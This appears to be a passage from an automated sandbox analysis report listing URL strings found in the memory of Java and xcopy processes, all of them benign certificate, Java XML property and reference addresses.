Source: javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005253000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000530E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A555000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005253000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000530E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A555000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: xcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://casper.beckman.uiuc.edu/~c-tsai4
Source: xcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://chasen.aist-nara.ac.jp/chasen/distribution.html
Source: xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://creativecommons.org/licenses/
Source: xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://creativecommons.org/licenses/WOAFID3PrivateFramehttp://musicbrainz.org%d/%d%drxRemixcr
Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
Source: javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009F78000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005253000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000530E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A555000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A579000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005253000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000530E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A555000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: xcopy.exe, 00000015.00000003.1728816995.00000000004DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: java.exe, 00000002.00000002.1638031502.000000000A40A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.oracle.com/
Source: java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000554C000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/dtd/properties.dtd
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/dom/properties/
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/dom/properties/(
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-check
Source: java.exe, 00000007.00000002.2851354329.0000000015736000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-checkrce
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage4
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource
Source: java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSourceX
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/schema/features/
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace0
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespacex
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd/No
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-state
Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/report-cdata-event
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing
Source: javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/3
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD
Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD;
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchema
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchemaD
Source: xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://musicbrainz.org
Source: javaw.exe, 00000006.00000002.2853953769.0000000015570000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A104000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A707000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000544E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852184942.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723167720.0000000015C69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://null.oracle.com/
